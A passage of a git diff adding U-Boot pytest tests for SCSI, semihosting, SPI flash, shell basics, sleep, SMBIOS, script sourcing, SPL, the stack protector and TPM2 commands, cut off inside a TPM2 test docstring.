+env__scsi_device_test = { + 'dev_num': 0, + 'device_type': 'Hard Disk', + 'device_capacity': '476940.0 MB', +} +""" + +def scsi_setup(u_boot_console): + f = u_boot_console.config.env.get('env__scsi_device_test', None) + if not f: + pytest.skip('No SCSI device to test') + + dev_num = f.get('dev_num', None) + if not isinstance(dev_num, int): + pytest.skip('No device number specified in env file to read') + + dev_type = f.get('device_type') + if not dev_type: + pytest.skip('No device type specified in env file to read') + + dev_size = f.get('device_capacity') + if not dev_size: + pytest.skip('No device capacity specified in env file to read') + + return dev_num, dev_type, dev_size + +@pytest.mark.buildconfigspec('cmd_scsi') +def test_scsi_reset(u_boot_console): + dev_num, dev_type, dev_size = scsi_setup(u_boot_console) + output = u_boot_console.run_command('scsi reset') + assert f'Device {dev_num}:' in output + assert f'Type: {dev_type}' in output + assert f'Capacity: {dev_size}' in output + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_scsi') +def test_scsi_info(u_boot_console): + dev_num, dev_type, dev_size = scsi_setup(u_boot_console) + output = u_boot_console.run_command('scsi info') + assert f'Device {dev_num}:' in output + assert f'Type: {dev_type}' in output + assert f'Capacity: {dev_size}' in output + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_scsi') +def test_scsi_scan(u_boot_console): + dev_num, dev_type, dev_size = scsi_setup(u_boot_console) + output = u_boot_console.run_command('scsi scan') + assert f'Device {dev_num}:' in output + assert f'Type: {dev_type}' in output + assert f'Capacity: {dev_size}' in output + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_scsi') +def test_scsi_dev(u_boot_console): + dev_num, dev_type, dev_size = scsi_setup(u_boot_console) + output = u_boot_console.run_command('scsi device') + assert 'no scsi devices available' not in output + assert f'device {dev_num}:' in output + assert f'Type: {dev_type}' in output + assert f'Capacity: {dev_size}' in output + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + output = u_boot_console.run_command('scsi device %d' % dev_num) + assert 'is now current device' in output + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_scsi') +def test_scsi_part(u_boot_console): + test_scsi_dev(u_boot_console) + output = u_boot_console.run_command('scsi part') + assert 'Partition Map for SCSI device' in output + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') diff --git a/test/py/tests/test_semihosting/conftest.py b/test/py/tests/test_semihosting/conftest.py new file mode 100644 index 00000000000..b00d8f4ea9c --- /dev/null +++ b/test/py/tests/test_semihosting/conftest.py @@ -0,0 +1,23 @@ +# SPDX-License-Identifier: GPL-2.0-or-later + +"""Fixture for semihosting command test +""" + +import os +import pytest + +@pytest.fixture(scope='session') +def semihosting_data(u_boot_config): + """Set up a file system to be used in semihosting tests + + Args: + u_boot_config -- U-Boot configuration. 
+ """ + image_path = u_boot_config.persistent_data_dir + '/semihosting.txt' + + with open(image_path, 'w', encoding = 'utf-8') as file: + file.write('Das U-Boot\n') + + yield image_path + + os.remove(image_path) diff --git a/test/py/tests/test_semihosting/test_hostfs.py b/test/py/tests/test_semihosting/test_hostfs.py new file mode 100644 index 00000000000..51f6fa7702c --- /dev/null +++ b/test/py/tests/test_semihosting/test_hostfs.py @@ -0,0 +1,33 @@ +# SPDX-License-Identifier: GPL-2.0+ + +""" Unit test for semihosting +""" + +import pytest + +@pytest.mark.buildconfigspec('semihosting') +def test_semihosting_hostfs(u_boot_console, semihosting_data): + """ Unit test for semihosting + + Args: + u_boot_console -- U-Boot console + semihosting_data -- Path to the disk image used for testing. + """ + response = u_boot_console.run_command( + f'load hostfs - $loadaddr {semihosting_data}') + assert '11 bytes read' in response + + response = u_boot_console.run_command( + 'crc32 $loadaddr $filesize') + assert '==> 60cfccfc' in response + + u_boot_console.run_command( + f'save hostfs - $loadaddr {semihosting_data} 11 11') + + response = u_boot_console.run_command( + f'load hostfs - $loadaddr {semihosting_data} 4 13') + assert '4 bytes read' in response + + response = u_boot_console.run_command( + 'crc32 $loadaddr $filesize') + assert '==> e29063ea' in response diff --git a/test/py/tests/test_sf.py b/test/py/tests/test_sf.py new file mode 100644 index 00000000000..adf8b7dc893 --- /dev/null +++ b/test/py/tests/test_sf.py @@ -0,0 +1,217 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2016, Xilinx Inc. Michal Simek +# Copyright (c) 2017, Xiphos Systems Corp. All rights reserved. + +import re +import pytest +import random +import u_boot_utils + +""" +Note: This test relies on boardenv_* containing configuration values to define +which SPI Flash areas are available for testing. Without this, this test will +be automatically skipped. +For example: + +# A list of sections of Flash memory to be tested. +env__sf_configs = ( + { + # Where in SPI Flash should the test operate. + 'offset': 0x00000000, + # This value is optional. + # If present, specifies the [[bus:]cs] argument used in `sf probe` + # If missing, defaults to 0. + 'id': '0:1', + # This value is optional. + # If set as a number, specifies the speed of the SPI Flash. + # If set as an array of 2, specifies a range for a random speed. + # If missing, defaults to 0. + 'speed': 1000000, + # This value is optional. + # If present, specifies the size to use for read/write operations. + # If missing, the SPI Flash page size is used as a default (based on + # the `sf probe` output). + 'len': 0x10000, + # This value is optional. + # If present, specifies if the test can write to Flash offset + # If missing, defaults to False. + 'writeable': False, + # This value is optional. + # If present, specifies the expected CRC32 value of the flash area. + # If missing, extra check is ignored. + 'crc32': 0xCAFECAFE, + }, +) +""" + +def sf_prepare(u_boot_console, env__sf_config): + """Check global state of the SPI Flash before running any test. + + Args: + u_boot_console: A U-Boot console connection. + env__sf_config: The single SPI Flash device configuration on which to + run the tests. + + Returns: + sf_params: a dictionary of SPI Flash parameters. 
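As an illustration of what the parsing below produces, a hypothetical 'sf probe' banner such as 'SF: Detected n25q128a with page size 256 Bytes, erase size 64 KiB, total 16 MiB' (device name and geometry invented for this example) would yield roughly:

    sf_params = {
        'ram_base': 0x10000000,          # from find_ram_base(), board-specific
        'speed': 0,                      # or the configured/random probe speed
        'page_size': 256,
        'erase_size': 64 * 1024,         # converted from KiB to bytes
        'total_size': 16 * 1024 * 1024,
        'len': 64 * 1024,                # defaults to one erase block
    }

Note that when the boardenv entry has no 'len', the code falls back to the erase size, and both 'offset' and 'len' must be erase-block aligned or the preparation step fails.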
+ """ + + sf_params = {} + sf_params['ram_base'] = u_boot_utils.find_ram_base(u_boot_console) + + probe_id = env__sf_config.get('id', 0) + speed = env__sf_config.get('speed', 0) + if isinstance(speed, int): + sf_params['speed'] = speed + else: + assert len(speed) == 2, "If speed is a list, it must have 2 entries" + sf_params['speed'] = random.randint(speed[0], speed[1]) + + cmd = 'sf probe %d %d' % (probe_id, sf_params['speed']) + + output = u_boot_console.run_command(cmd) + assert 'SF: Detected' in output, 'No Flash device available' + + m = re.search('page size (.+?) Bytes', output) + assert m, 'SPI Flash page size not recognized' + sf_params['page_size'] = int(m.group(1)) + + m = re.search('erase size (.+?) KiB', output) + assert m, 'SPI Flash erase size not recognized' + sf_params['erase_size'] = int(m.group(1)) + sf_params['erase_size'] *= 1024 + + m = re.search('total (.+?) MiB', output) + assert m, 'SPI Flash total size not recognized' + sf_params['total_size'] = int(m.group(1)) + sf_params['total_size'] *= 1024 * 1024 + + assert 'offset' in env__sf_config, \ + '\'offset\' is required for this test.' + sf_params['len'] = env__sf_config.get('len', sf_params['erase_size']) + + assert not env__sf_config['offset'] % sf_params['erase_size'], \ + 'offset not multiple of erase size.' + assert not sf_params['len'] % sf_params['erase_size'], \ + 'erase length not multiple of erase size.' + + assert not (env__sf_config.get('writeable', False) and + 'crc32' in env__sf_config), \ + 'Cannot check crc32 on writeable sections' + + return sf_params + +def sf_read(u_boot_console, env__sf_config, sf_params): + """Helper function used to read and compute the CRC32 value of a section of + SPI Flash memory. + + Args: + u_boot_console: A U-Boot console connection. + env__sf_config: The single SPI Flash device configuration on which to + run the tests. + sf_params: SPI Flash parameters. + + Returns: + CRC32 value of SPI Flash section + """ + + addr = sf_params['ram_base'] + offset = env__sf_config['offset'] + count = sf_params['len'] + pattern = random.randint(0, 0xFF) + crc_expected = env__sf_config.get('crc32', None) + + cmd = 'mw.b %08x %02x %x' % (addr, pattern, count) + u_boot_console.run_command(cmd) + crc_pattern = u_boot_utils.crc32(u_boot_console, addr, count) + if crc_expected: + assert crc_pattern != crc_expected + + cmd = 'sf read %08x %08x %x' % (addr, offset, count) + response = u_boot_console.run_command(cmd) + assert 'Read: OK' in response, 'Read operation failed' + crc_readback = u_boot_utils.crc32(u_boot_console, addr, count) + assert crc_pattern != crc_readback, 'sf read did not update RAM content.' + if crc_expected: + assert crc_readback == crc_expected + + return crc_readback + +def sf_update(u_boot_console, env__sf_config, sf_params): + """Helper function used to update a section of SPI Flash memory. + + Args: + u_boot_console: A U-Boot console connection. + env__sf_config: The single SPI Flash device configuration on which to + run the tests. 
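+        sf_params: SPI Flash parameters, as returned by sf_prepare().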
+ + Returns: + CRC32 value of SPI Flash section + """ + + addr = sf_params['ram_base'] + offset = env__sf_config['offset'] + count = sf_params['len'] + pattern = int(random.random() * 0xFF) + + cmd = 'mw.b %08x %02x %x' % (addr, pattern, count) + u_boot_console.run_command(cmd) + crc_pattern = u_boot_utils.crc32(u_boot_console, addr, count) + + cmd = 'sf update %08x %08x %x' % (addr, offset, count) + u_boot_console.run_command(cmd) + crc_readback = sf_read(u_boot_console, env__sf_config, sf_params) + + assert crc_readback == crc_pattern + +@pytest.mark.buildconfigspec('cmd_sf') +@pytest.mark.buildconfigspec('cmd_crc32') +@pytest.mark.buildconfigspec('cmd_memory') +def test_sf_read(u_boot_console, env__sf_config): + sf_params = sf_prepare(u_boot_console, env__sf_config) + sf_read(u_boot_console, env__sf_config, sf_params) + +@pytest.mark.buildconfigspec('cmd_sf') +@pytest.mark.buildconfigspec('cmd_crc32') +@pytest.mark.buildconfigspec('cmd_memory') +def test_sf_read_twice(u_boot_console, env__sf_config): + sf_params = sf_prepare(u_boot_console, env__sf_config) + + crc1 = sf_read(u_boot_console, env__sf_config, sf_params) + sf_params['ram_base'] += 0x100 + crc2 = sf_read(u_boot_console, env__sf_config, sf_params) + + assert crc1 == crc2, 'CRC32 of two successive read operation do not match' + +@pytest.mark.buildconfigspec('cmd_sf') +@pytest.mark.buildconfigspec('cmd_crc32') +@pytest.mark.buildconfigspec('cmd_memory') +def test_sf_erase(u_boot_console, env__sf_config): + if not env__sf_config.get('writeable', False): + pytest.skip('Flash config is tagged as not writeable') + + sf_params = sf_prepare(u_boot_console, env__sf_config) + addr = sf_params['ram_base'] + offset = env__sf_config['offset'] + count = sf_params['len'] + + cmd = 'sf erase %08x %x' % (offset, count) + output = u_boot_console.run_command(cmd) + assert 'Erased: OK' in output, 'Erase operation failed' + + cmd = 'mw.b %08x ff %x' % (addr, count) + u_boot_console.run_command(cmd) + crc_ffs = u_boot_utils.crc32(u_boot_console, addr, count) + + crc_read = sf_read(u_boot_console, env__sf_config, sf_params) + assert crc_ffs == crc_read, 'Unexpected CRC32 after erase operation.' + +@pytest.mark.buildconfigspec('cmd_sf') +@pytest.mark.buildconfigspec('cmd_crc32') +@pytest.mark.buildconfigspec('cmd_memory') +def test_sf_update(u_boot_console, env__sf_config): + if not env__sf_config.get('writeable', False): + pytest.skip('Flash config is tagged as not writeable') + + sf_params = sf_prepare(u_boot_console, env__sf_config) + sf_update(u_boot_console, env__sf_config, sf_params) diff --git a/test/py/tests/test_shell_basics.py b/test/py/tests/test_shell_basics.py new file mode 100644 index 00000000000..68a3f892f6b --- /dev/null +++ b/test/py/tests/test_shell_basics.py @@ -0,0 +1,45 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2015-2016, NVIDIA CORPORATION. All rights reserved. + +# Test basic shell functionality, such as commands separate by semi-colons. 
+ +import pytest + +pytestmark = pytest.mark.buildconfigspec('cmd_echo') + +def test_shell_execute(u_boot_console): + """Test any shell command.""" + + response = u_boot_console.run_command('echo hello') + assert response.strip() == 'hello' + +def test_shell_semicolon_two(u_boot_console): + """Test two shell commands separate by a semi-colon.""" + + cmd = 'echo hello; echo world' + response = u_boot_console.run_command(cmd) + # This validation method ignores the exact whitespace between the strings + assert response.index('hello') < response.index('world') + +def test_shell_semicolon_three(u_boot_console): + """Test three shell commands separate by a semi-colon, with variable + expansion dependencies between them.""" + + cmd = 'setenv list 1; setenv list ${list}2; setenv list ${list}3; ' + \ + 'echo ${list}' + response = u_boot_console.run_command(cmd) + assert response.strip() == '123' + u_boot_console.run_command('setenv list') + +def test_shell_run(u_boot_console): + """Test the "run" shell command.""" + + u_boot_console.run_command('setenv foo \'setenv monty 1; setenv python 2\'') + u_boot_console.run_command('run foo') + response = u_boot_console.run_command('echo ${monty}') + assert response.strip() == '1' + response = u_boot_console.run_command('echo ${python}') + assert response.strip() == '2' + u_boot_console.run_command('setenv foo') + u_boot_console.run_command('setenv monty') + u_boot_console.run_command('setenv python') diff --git a/test/py/tests/test_sleep.py b/test/py/tests/test_sleep.py new file mode 100644 index 00000000000..66a57434bff --- /dev/null +++ b/test/py/tests/test_sleep.py @@ -0,0 +1,61 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved. + +import pytest +import time + +""" +Note: This test doesn't rely on boardenv_* configuration values but they can +change test behavior. + +# Setup env__sleep_accurate to False if time is not accurate on your platform +env__sleep_accurate = False + +# Setup env__sleep_time time in seconds board is set to sleep +env__sleep_time = 3 + +# Setup env__sleep_margin set a margin for any system overhead +env__sleep_margin = 0.25 + +""" + +def test_sleep(u_boot_console): + """Test the sleep command, and validate that it sleeps for approximately + the correct amount of time.""" + + sleep_skip = u_boot_console.config.env.get('env__sleep_accurate', True) + if not sleep_skip: + pytest.skip('sleep is not accurate') + + if u_boot_console.config.buildconfig.get('config_cmd_misc', 'n') != 'y': + pytest.skip('sleep command not supported') + + # 3s isn't too long, but is enough to cross a few second boundaries. + sleep_time = u_boot_console.config.env.get('env__sleep_time', 3) + sleep_margin = u_boot_console.config.env.get('env__sleep_margin', 0.25) + tstart = time.time() + u_boot_console.run_command('sleep %d' % sleep_time) + tend = time.time() + elapsed = tend - tstart + assert elapsed >= (sleep_time - 0.01) + if not u_boot_console.config.gdbserver: + # margin is hopefully enough to account for any system overhead. 
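+        # The upper bound is skipped under gdbserver, where execution can be
+        # stalled for arbitrarily long.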
+ assert elapsed < (sleep_time + sleep_margin) + +@pytest.mark.buildconfigspec("cmd_misc") +def test_time(u_boot_console): + """Test the time command, and validate that it gives approximately the + correct amount of command execution time.""" + + sleep_skip = u_boot_console.config.env.get("env__sleep_accurate", True) + if not sleep_skip: + pytest.skip("sleep is not accurate") + + sleep_time = u_boot_console.config.env.get("env__sleep_time", 10) + sleep_margin = u_boot_console.config.env.get("env__sleep_margin", 0.25) + output = u_boot_console.run_command("time sleep %d" % sleep_time) + execute_time = float(output.split()[1]) + assert sleep_time >= (execute_time - 0.01) + if not u_boot_console.config.gdbserver: + # margin is hopefully enough to account for any system overhead. + assert sleep_time < (execute_time + sleep_margin) diff --git a/test/py/tests/test_smbios.py b/test/py/tests/test_smbios.py new file mode 100644 index 00000000000..82b0b689830 --- /dev/null +++ b/test/py/tests/test_smbios.py @@ -0,0 +1,41 @@ +# SPDX-License-Identifier: GPL-2.0-or-later + +"""Test smbios command""" + +import pytest + +@pytest.mark.buildconfigspec('cmd_smbios') +@pytest.mark.notbuildconfigspec('qfw_smbios') +@pytest.mark.notbuildconfigspec('sandbox') +def test_cmd_smbios(u_boot_console): + """Run the smbios command""" + output = u_boot_console.run_command('smbios') + assert 'DMI type 127,' in output + +@pytest.mark.buildconfigspec('cmd_smbios') +@pytest.mark.buildconfigspec('qfw_smbios') +@pytest.mark.notbuildconfigspec('sandbox') +# TODO: +# QEMU v8.2.0 lacks SMBIOS support for RISC-V +# Once support is available in our Docker image we can remove the constraint. +@pytest.mark.notbuildconfigspec('riscv') +def test_cmd_smbios_qemu(u_boot_console): + """Run the smbios command on QEMU""" + output = u_boot_console.run_command('smbios') + assert 'DMI type 1,' in output + assert 'Manufacturer: QEMU' in output + assert 'DMI type 127,' in output + +@pytest.mark.buildconfigspec('cmd_smbios') +@pytest.mark.buildconfigspec('sandbox') +def test_cmd_smbios_sandbox(u_boot_console): + """Run the smbios command on the sandbox""" + output = u_boot_console.run_command('smbios') + assert 'DMI type 0,' in output + assert 'String 1: U-Boot' in output + assert 'DMI type 1,' in output + assert 'Manufacturer: sandbox' in output + assert 'DMI type 2,' in output + assert 'DMI type 3,' in output + assert 'DMI type 4,' in output + assert 'DMI type 127,' in output diff --git a/test/py/tests/test_source.py b/test/py/tests/test_source.py new file mode 100644 index 00000000000..bbc311df6d1 --- /dev/null +++ b/test/py/tests/test_source.py @@ -0,0 +1,37 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (C) 2022 Sean Anderson <sean.anderson@seco.com> + +import os +import pytest +import u_boot_utils as util + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_echo') +@pytest.mark.buildconfigspec('cmd_source') +@pytest.mark.buildconfigspec('fit') +def test_source(u_boot_console): + # Compile our test script image + cons = u_boot_console + mkimage = os.path.join(cons.config.build_dir, 'tools/mkimage') + its = os.path.join(cons.config.source_dir, 'test/py/tests/source.its') + fit = os.path.join(cons.config.build_dir, 'source.itb') + util.run_and_log(cons, (mkimage, '-f', its, fit)) + cons.run_command(f'host load hostfs - $loadaddr {fit}') + + assert '2' in cons.run_command('source') + assert '1' in cons.run_command('source :') + assert '1' in cons.run_command('source :script-1') + assert '2' in cons.run_command('source 
:script-2') + assert 'Fail' in cons.run_command('source :not-a-script || echo Fail') + assert '2' in cons.run_command('source \\#') + assert '1' in cons.run_command('source \\#conf-1') + assert '2' in cons.run_command('source \\#conf-2') + + cons.run_command('fdt addr $loadaddr') + cons.run_command('fdt rm /configurations default') + assert '1' in cons.run_command('source') + assert 'Fail' in cons.run_command('source \\# || echo Fail') + + cons.run_command('fdt rm /images default') + assert 'Fail' in cons.run_command('source || echo Fail') + assert 'Fail' in cons.run_command('source \\# || echo Fail') diff --git a/test/py/tests/test_spl.py b/test/py/tests/test_spl.py new file mode 100644 index 00000000000..42e4c4342b2 --- /dev/null +++ b/test/py/tests/test_spl.py @@ -0,0 +1,44 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright 2020 Google LLC +# Written by Simon Glass <sjg@chromium.org> + +import os.path +import pytest + +@pytest.mark.buildconfigspec('spl_unit_test') +def test_ut_spl_init(u_boot_console): + """Initialize data for ut spl tests.""" + + fn = u_boot_console.config.source_dir + '/spi.bin' + if not os.path.exists(fn): + data = b'\x00' * (2 * 1024 * 1024) + with open(fn, 'wb') as fh: + fh.write(data) + +def test_spl(u_boot_console, ut_spl_subtest): + """Execute a "ut" subtest. + + The subtests are collected in function generate_ut_subtest() from linker + generated lists by applying a regular expression to the lines of file + spl/u-boot-spl.sym. The list entries are created using the C macro + UNIT_TEST(). + + Strict naming conventions have to be followed to match the regular + expression. Use UNIT_TEST(foo_test_bar, _flags, foo_test) for a test bar in + test suite foo that can be executed via command 'ut foo bar' and is + implemented in C function foo_test_bar(). + + Args: + u_boot_console (ConsoleBase): U-Boot console + ut_subtest (str): SPL test to be executed (e.g. 'dm platdata_phandle') + """ + try: + cons = u_boot_console + cons.restart_uboot_with_flags(['-u', '-k', ut_spl_subtest.split()[1]]) + output = cons.get_spawn_output().replace('\r', '') + assert 'Failures: 0' in output + finally: + # Restart afterward in case a non-SPL test is run next. This should not + # happen since SPL tests are run in their own invocation of test.py, but + # the cost of doing this is not too great at present. + u_boot_console.restart_uboot() diff --git a/test/py/tests/test_stackprotector.py b/test/py/tests/test_stackprotector.py new file mode 100644 index 00000000000..b87392c54ff --- /dev/null +++ b/test/py/tests/test_stackprotector.py @@ -0,0 +1,15 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2021 Broadcom + +import pytest +import signal + +@pytest.mark.buildconfigspec('cmd_stackprotector_test') +@pytest.mark.notbuildconfigspec('asan') +def test_stackprotector(u_boot_console): + """Test that the stackprotector function works.""" + + u_boot_console.run_command('stackprot_test',wait_for_prompt=False) + expected_response = 'Stack smashing detected' + u_boot_console.wait_for(expected_response) + u_boot_console.restart_uboot() diff --git a/test/py/tests/test_tpm2.py b/test/py/tests/test_tpm2.py new file mode 100644 index 00000000000..1d654cd4a23 --- /dev/null +++ b/test/py/tests/test_tpm2.py @@ -0,0 +1,318 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2018, Bootlin +# Author: Miquel Raynal <miquel.raynal@bootlin.com> + +import os.path +import pytest +import u_boot_utils +import re +import time + +""" +Test the TPMv2.x related commands. 
You must have a working hardware setup in +order to do these tests. + +Notes: +* These tests will prove the password mechanism. The TPM chip must be cleared of +any password. +* Commands like pcr_setauthpolicy and pcr_resetauthpolicy are not implemented +here because they would fail the tests in most cases (TPMs do not implement them +and return an error). + + +Note: +This test doesn't rely on boardenv_* configuration value but can change test +behavior. + +* Setup env__tpm_device_test_skip to True if tests with TPM devices should be +skipped. + +""" + +updates = 0 + +def force_init(u_boot_console, force=False): + """When a test fails, U-Boot is reset. Because TPM stack must be initialized + after each reboot, we must ensure these lines are always executed before + trying any command or they will fail with no reason. Executing 'tpm init' + twice will spawn an error used to detect that the TPM was not reset and no + initialization code should be run. + """ + skip_test = u_boot_console.config.env.get('env__tpm_device_test_skip', False) + if skip_test: + pytest.skip('skip TPM device test') + output = u_boot_console.run_command('tpm2 autostart') + if force or not 'Error' in output: + u_boot_console.run_command('echo --- start of init ---') + u_boot_console.run_command('tpm2 clear TPM2_RH_LOCKOUT') + output = u_boot_console.run_command('echo $?') + if not output.endswith('0'): + u_boot_console.run_command('tpm2 clear TPM2_RH_PLATFORM') + u_boot_console.run_command('echo --- end of init ---') + +def is_sandbox(cons): + # Array slice removes leading/trailing quotes. + sys_arch = cons.config.buildconfig.get('config_sys_arch', '"sandbox"')[1:-1] + return sys_arch == 'sandbox' + +@pytest.mark.buildconfigspec('cmd_tpm_v2') +def test_tpm2_init(u_boot_console): + """Init the software stack to use TPMv2 commands.""" + skip_test = u_boot_console.config.env.get('env__tpm_device_test_skip', False) + if skip_test: + pytest.skip('skip TPM device test') + u_boot_console.run_command('tpm2 autostart') + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_tpm_v2') +def test_tpm2_startup(u_boot_console): + """Execute a TPM2_Startup command. + + Initiate the TPM internal state machine. + """ + skip_test = u_boot_console.config.env.get('env__tpm_device_test_skip', False) + if skip_test: + pytest.skip('skip TPM device test') + u_boot_console.run_command('tpm2 startup TPM2_SU_CLEAR') + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + +def tpm2_sandbox_init(u_boot_console): + """Put sandbox back into a known state so we can run a test + + This allows all tests to run in parallel, since no test depends on another. + """ + u_boot_console.restart_uboot() + u_boot_console.run_command('tpm2 autostart') + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + + skip_test = u_boot_console.config.env.get('env__tpm_device_test_skip', False) + if skip_test: + pytest.skip('skip TPM device test') + +@pytest.mark.buildconfigspec('cmd_tpm_v2') +def test_tpm2_sandbox_self_test_full(u_boot_console): + """Execute a TPM2_SelfTest (full) command. + + Ask the TPM to perform all self tests to also enable full capabilities. 
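+
+    On sandbox, U-Boot is restarted and 'tpm2 autostart' plus 'tpm2 startup'
+    are re-run first, putting the TPM back into a known state so that this
+    test does not depend on earlier ones.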
+ """ + if is_sandbox(u_boot_console): + u_boot_console.restart_uboot() + u_boot_console.run_command('tpm2 autostart') + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + + u_boot_console.run_command('tpm2 startup TPM2_SU_CLEAR') + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + + skip_test = u_boot_console.config.env.get('env__tpm_device_test_skip', False) + if skip_test: + pytest.skip('skip TPM device test') + u_boot_console.run_command('tpm2 self_test full') + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_tpm_v2') +def test_tpm2_continue_self_test(u_boot_console): + """Execute a TPM2_SelfTest (continued) command. + + Ask the TPM to finish its self tests (alternative to the full test) in order + to enter a fully operational state. + """ + + skip_test = u_boot_console.config.env.get('env__tpm_device_test_skip', False) + if skip_test: + pytest.skip('skip TPM device test') + if is_sandbox(u_boot_console): + tpm2_sandbox_init(u_boot_console) + u_boot_console.run_command('tpm2 self_test continue') + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_tpm_v2') +def test_tpm2_clear(u_boot_console): + """Execute a TPM2_Clear command. + + Ask the TPM to reset entirely its internal state (including internal + configuration, passwords, counters and DAM parameters). This is half of the + TAKE_OWNERSHIP command from TPMv1. + + Use the LOCKOUT hierarchy for this. The LOCKOUT/PLATFORM hierarchies must + not have a password set, otherwise this test will fail. ENDORSEMENT and + PLATFORM hierarchies are also available. + """ + if is_sandbox(u_boot_console): + tpm2_sandbox_init(u_boot_console) + + skip_test = u_boot_console.config.env.get('env__tpm_device_test_skip', False) + if skip_test: + pytest.skip('skip TPM device test') + u_boot_console.run_command('tpm2 clear TPM2_RH_LOCKOUT') + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + + u_boot_console.run_command('tpm2 clear TPM2_RH_PLATFORM') + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_tpm_v2') +def test_tpm2_change_auth(u_boot_console): + """Execute a TPM2_HierarchyChangeAuth command. + + Ask the TPM to change the owner, ie. set a new password: 'unicorn' + + Use the LOCKOUT hierarchy for this. ENDORSEMENT and PLATFORM hierarchies are + also available. + """ + if is_sandbox(u_boot_console): + tpm2_sandbox_init(u_boot_console) + force_init(u_boot_console) + + u_boot_console.run_command('tpm2 change_auth TPM2_RH_LOCKOUT unicorn') + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + + u_boot_console.run_command('tpm2 clear TPM2_RH_LOCKOUT unicorn') + output = u_boot_console.run_command('echo $?') + u_boot_console.run_command('tpm2 clear TPM2_RH_PLATFORM') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('sandbox') +@pytest.mark.buildconfigspec('cmd_tpm_v2') +def test_tpm2_get_capability(u_boot_console): + """Execute a TPM_GetCapability command. + + Display one capability. In our test case, let's display the default DAM + lockout counter that should be 0 since the CLEAR: + - TPM_CAP_TPM_PROPERTIES = 0x6 + - TPM_PT_LOCKOUT_COUNTER (1st parameter) = PTR_VAR + 14 + + There is no expected default values because it would depend on the chip + used. We can still save them in order to check they have changed later. 
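+
+    Since PTR_VAR (TPM_PT_VAR) is 0x200, the property index queried below is
+    0x20e, and its value is expected to read back as 0 right after the clear.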
+ """ + if is_sandbox(u_boot_console): + tpm2_sandbox_init(u_boot_console) + + force_init(u_boot_console) + ram = u_boot_utils.find_ram_base(u_boot_console) + + read_cap = u_boot_console.run_command('tpm2 get_capability 0x6 0x20e 0x200 1') #0x%x 1' % ram) + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + assert 'Property 0x0000020e: 0x00000000' in read_cap + +@pytest.mark.buildconfigspec('cmd_tpm_v2') +def test_tpm2_dam_parameters(u_boot_console): + """Execute a TPM2_DictionaryAttackParameters command. + + Change Dictionary Attack Mitigation (DAM) parameters. Ask the TPM to change: + - Max number of failed authentication before lockout: 3 + - Time before the failure counter is automatically decremented: 10 sec + - Time after a lockout failure before it can be attempted again: 0 sec + + For an unknown reason, the DAM parameters must be changed before changing + the authentication, otherwise the lockout will be engaged after the first + failed authentication attempt. + """ + if is_sandbox(u_boot_console): + tpm2_sandbox_init(u_boot_console) + force_init(u_boot_console) + ram = u_boot_utils.find_ram_base(u_boot_console) + + # Set the DAM parameters to known values + u_boot_console.run_command('tpm2 dam_parameters 3 10 0') + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + + # Check the values have been saved + read_cap = u_boot_console.run_command('tpm2 get_capability 0x6 0x20f 0x%x 3' % ram) + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + assert 'Property 0x0000020f: 0x00000003' in read_cap + assert 'Property 0x00000210: 0x0000000a' in read_cap + assert 'Property 0x00000211: 0x00000000' in read_cap + +@pytest.mark.buildconfigspec('cmd_tpm_v2') +def test_tpm2_pcr_read(u_boot_console): + """Execute a TPM2_PCR_Read command. + + Perform a PCR read of the 10th PCR. Must be zero. + """ + if is_sandbox(u_boot_console): + tpm2_sandbox_init(u_boot_console) + + force_init(u_boot_console) + ram = u_boot_utils.find_ram_base(u_boot_console) + + read_pcr = u_boot_console.run_command('tpm2 pcr_read 10 0x%x' % ram) + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + + # Save the number of PCR updates + str = re.findall(r'\d+ known updates', read_pcr)[0] + global updates + updates = int(re.findall(r'\d+', str)[0]) + + # Check the output value + assert 'PCR #10 content' in read_pcr + assert '00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00' in read_pcr + +@pytest.mark.buildconfigspec('cmd_tpm_v2') +def test_tpm2_pcr_extend(u_boot_console): + """Execute a TPM2_PCR_Extend command. + + Perform a PCR extension with a known hash in memory (zeroed since the board + must have been rebooted). + + No authentication mechanism is used here, not protecting against packet + replay, yet. 
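+
+    Since both the current PCR value and the digest being extended are 32
+    zero bytes, the PCR content checked below should be SHA-256 of 64 zero
+    bytes (the f5 a5 fd 42 ... value).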
